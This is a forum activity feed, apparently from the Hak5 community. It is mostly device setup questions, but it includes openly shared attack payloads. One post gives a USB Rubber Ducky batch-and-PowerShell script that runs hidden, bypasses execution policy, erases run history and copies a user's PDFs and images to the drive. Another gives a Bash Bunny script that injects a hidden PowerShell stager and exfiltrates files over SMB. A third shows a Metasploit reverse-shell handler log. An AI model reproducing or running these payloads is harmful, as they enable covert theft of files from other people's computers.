Jump to content

All Activity

This stream auto-updates     

  1. Today
  2. https://forums.hak5.org/forum/89-wifi-pineapple-nano/
  3. Hi, There is no way to import JSON results into PineAP after they have been deleted. It's a nice feature though that we'd like to implement some time.
  4. about a week ago if got my UBS-Rubber-Ducky and i thought i would rework the USB Exfiltration payload from Hak5 episodes 2112 - 2114 to run as a .ps1 script and i would like to share it to get some opinions on it here is my Code: d.cmd: @echo off start powerShell.exe -nologo -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& '%~dpn0.ps1'" start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" cscript %~d0\i.vbs %~dnp0\d.ps1 REM @exit d.ps1: REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f # Setup source and destination paths $Src = ${env:USERPROFILE} $sDL = (Get-Volume -FileSystemLabel _).DriveLetter #selectin the DriveLetter $dt1=":\slurp\${Env:ComputerName}_$((Get-Date).ToString('yyyy-MM-dd _ hh-mm-ss'))"; #Destination folder $Dst=$sDL+$dt1; #combining DriveLetter with Destination folder if (!(Test-Path $Dst)) { mkdir $Dst } # Wildcard for filter $Extension = '*40983063xch*', '*.pdf', '*.jpg' # Get file recursively Get-ChildItem -Path $Src -Filter $Extension -Recurse | Where-Object {!$_.PsIsContainer} | # For each file ForEach-Object { # If file exist in destination folder, rename it with directory tag if(Test-Path -Path (Join-Path -Path $Dst -ChildPath $_.Name)) { # Get full path to the file without drive letter and replace `\` with '-' # [regex]::Escape is needed because -replace uses regex, so we should escape '\' $NameWithDirTag = (Split-Path -Path $_.FullName -NoQualifier) -replace [regex]::Escape('\'), '-' # Join new file name with destination directory $NewPath = Join-Path -Path $Dst -ChildPath $NameWithDirTag } # Don't modify new file path, if file doesn't exist in target dir else { $NewPath = $Dst } # Copy file Copy-Item -Path $_.FullName -Destination $NewPath } $wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}'); exit
  5. How can I import previously downloaded JSON file again to the WiFi Pineapple TETRA and review.
  6. The subject says it all, please remove me from the forums. I don't see a way to delete my account information.
  7. Yesterday
  8. Hi..... 1. On a Pi0w-P4wnP1-ALOA i run a https listener 2. in the Pineapple Nano Meterpreter webmodule i enter LHOST and LPORT of the listener..... 3. now i connect a 3rd device to the nano-hosted "openWiF" and surf to the landing page in a webbrowser.... 4. after a few seconds on the Pi Zero console that happens =[ metasploit v5.0.29-dev ] + -- --=[ 1898 exploits - 1068 auxiliary - 329 post ] + -- --=[ 547 payloads - 44 encoders - 10 nops ] + -- --=[ 2 evasion ] [*] Processing /home/pi/.scripts/listen.rc for ERB directives. resource (/home/pi/.scripts/listen.rc)> use multi/handler resource (/home/pi/.scripts/listen.rc)> set payload windows/meterpreter/reverse_https payload => windows/meterpreter/reverse_https resource (/home/pi/.scripts/listen.rc)> set LHOST xxx.xxx.xxx.xxx LHOST => xxx.xxx.xxx.xxx resource (/home/pi/.scripts/listen.rc)> set LPORT xxxx LPORT => xxxx resource (/home/pi/.scripts/listen.rc)> set ExitOnSession true ExitOnSession => true resource (/home/pi/.scripts/listen.rc)> set AutoVerifySession false AutoVerifySession => false resource (/home/pi/.scripts/listen.rc)> set AutoSystemInfo false AutoSystemInfo => false resource (/home/pi/.scripts/listen.rc)> set AutoLoadStdapi false AutoLoadStdapi => false resource (/home/pi/.scripts/listen.rc)> exploit -j [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. msf5 exploit(multi/handler) > [*] Started HTTPS reverse handler on https://xxx.xxx.xxx.xxx:xxxx And no more not less? 🤷‍♂️ My question is how to get an active meterpreter session to use stuff like "getuid" and "getsystem"!
  9. Hello, I have recently purchased my wifipineapple. the first day I was able to load bulletins and follow the hak5 setup tutorial but now (the next day) I am unable to load bulletins, check for updates, or load modules from wifipineapple.com. Also, I am running on windows 10 on the Acer aspire e15. I have followed the setup tutorial and everything is configured correctly so i don't understand.
  10. hey guys I just read those comments and I know they're over a year old I'm new to this I just purchased the WiFi pineapple nano tactical I'm trying to make sense out of what's being said since I feel that I'm having the same issue what I want to do is use my cell phone only no laptop. I already have it set up everything is working fine however I want to connect the USB dongle which I believe will set wlan2 correct? And how do I access my dashboard on my Android device? I'm able to connect via Wi-Fi to the pineapple I type in the IP address but nothing happens I can't connect any tips anybody? so basically I want to connect my Android wirelessly to the pineapple while it has the USB dongle even though I know the dongle is not used for me being able to connect cuz I believe I can connect to the pineapple without the USB dongle from what I understand the USB dongle is necessary for wlan2 so is there anyway I can control the pineapple through my Android phone while it's still has the USB dongle connection?
  11. R03L

    USB HID

    You could technically use this to use for data recovery right, or afther a new installation use it as a clean and neat backup sollution such a hid human interface device, could be used to input standard tasks somebody does with their computer when specific needs apply. i guess.?
  12. Ow wauw since a year we use the term clickbait, but could we make usage of chosen keymaps using for instance, dipswitches. meybe in the alternative form as in the original ducky. excuse me, its mindblowing. i love your show's, verry entertaining good job.
  13. I tried using its gateway address .1 but it still doesnt work. According tothe HAK5 youtube setup video I am to use .42 for its IP and log in using the .1 address
  14. Hello everybody I'm new to this but I'm pretty familiar with how to have it up and running on Android. I recently bought a WiFi pineapple nano tactical kit I upgraded the firmware and did the setup via Android. I got the internet connection going pretty much everything is looking good however I'm having trouble understanding the wifi dongle that the tactical kit came with. I do know that you need it to set wlan2 how can I manage to do that on Android? If I connect the dongle to the nano how do I log in using my phone without going into the pineapple app that requires USB tether? Do I have to use another device rather than using the Android? Any tips would be greatly appreciated thank you in advance.
  15. Hello everybody I'm new to this but I'm pretty familiar with how to have it up and running on Android. Mike recently bought a WiFi pineapple nano tactical kit I upgraded the firmware and did the setup via Android. I got the internet connection going pretty much everything is looking good however I'm having trouble understanding the wifi dongle that the tactical kit came with. I do know that you need it to set wlan2 how can I manage to do that on Android? If I connect the dongle to the nano how do I log in using my phone without going into the pineapple app that requires USB tether? What do I have to use another device rather than using the Android? Any tips would be greatly appreciated thank you in advance.
  16. You can call just ATTACKMODE again with different parameters to achieve what you want. In your case you'd start with ATTACKMODE HID STORAGE then do what ever you need to do and then call ATTACKMODE HID to remove the storage aspect. Hope that helps.
  17. I experience the exect same issue. I've bought the Nano 6 months ago but failed to get the internet-sharing bit up and running. Very frustrated I disregarded the whole (for me not working) Wifi Pineapple Nano. Recently I found the Nano again, and thought i'd give it a new try. Unfortunately same outcome. This just does not work!! Upgraded firmware/factory reset/followed all information on this forum and the rest of the internet. It-does-Not-work. Sorry for my frustration, maybe somebody can give me any support please?
  18. CNC machine tools are very important in industries, but cause they are black pots and seldom study in it, so It does have many problems and vuls there. For example, FANUC series CNC machine tools have many DOS vuls and cannot be find on CVE. Let's talk about this issue and how to defense the attacks like this.
  19. Spectre32787 - You need to use 176.16.42.1which is the wifi pineapples address.
  20. I have the very same problem here. It appears to have occurred after going from the Ralink wifi adapter back to USB ethernet. I can connect to the management portal but cannot connect to wifipineapple.com which is obviously up However mine does not have a second IP address under the advanced tab. I have tried disabling and enabling the adapter, unplugging and plugging it back in, and redoing the ICS several times to no avail. Do I need to do a factory reset just to get it work again?
  21. Last week
  22. Are you using a VM, live or local install of Kali? "How" the two work together with each instance is a little different. I hope these help. https://docs.hak5.org/hc/en-us/articles/360010555313-Setup-Basics https://docs.hak5.org/hc/en-us/articles/360010555373-WiFi-Pineapple-TETRA-Linux-Setup Sometimes there can be issues regarding the wifi sharing between the two. Be sure to configure everything properly. Regards, Mr. C.
  23. Hi, I really want to apologise for my delay in responding to the thread, we've been very busy working behind the scenes on upcoming stuff that we're excited to announce shortly. I've reviewed the debug output (thank you!), and it seems that unfortunately you both just received bad units. If you could both send me the support ticket numbers you have to me via a PM on the forums, I will get new ones sent out to you asap. Thanks
  24. Was having the blinking blue LED issue like a few other commenters, decided to fsck around and see what's what. Fixed it and added SMBv2 support to the script, with no changes made to the PowerShell script (s.ps1). @Darren Kitchen any chance these changes can be reflected on the official Github repo? #!/bin/bash # LED STATUS # ========== # FAIL........Failed to find dependencies # STAGE2......Ethernet Stage # SETUP.......HID Stage # SPECIAL.....Receiving Files # CLEANUP.....Moving Liberated Files # FINISH......Finished # # OPTIONS # ======= # Exfiltration options configured from included s.ps1 script ######## INITIALIZATION ######## REQUIRETOOL impacket GET SWITCH_POSITION # Make temporary loot directory mkdir -p /loot/smb/ # Delete any old exfiltration data rm -rf /loot/smb/* # Copy new powershell payload to smb share cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ # Make loot directory on USB Disk mkdir -p /root/udisk/loot/smb_exfiltrator ######## ETHERNET STAGE ######## LED STAGE2 ATTACKMODE RNDIS_ETHERNET # Start the SMB Server python /tools/impacket/examples/smbserver.py -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log & # Re-enable ICMP/echo replies to trip the powershell stager echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all ######## HID STAGE ######## # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available GET HOST_IP LED SETUP ATTACKMODE HID RNDIS_ETHERNET RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"While (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { \\\\$HOST_IP\\s\\s.ps1; exit } }\"" LED B 100 # Wait until files are done copying. while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done ######## CLEANUP ######## LED CLEANUP # Delete EXFILTRATION_COMPLETE file rm -rf /loot/smb/EXFILTRATION_COMPLETE # Move files to udisk loot directory mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator # Clean up temporary loot directory rm -rf /loot/smb/e/* # Sync file system sync ######## FINISH ######## # Trap is clean LED FINISH
  1. Load more activity
×
×
  • Create New...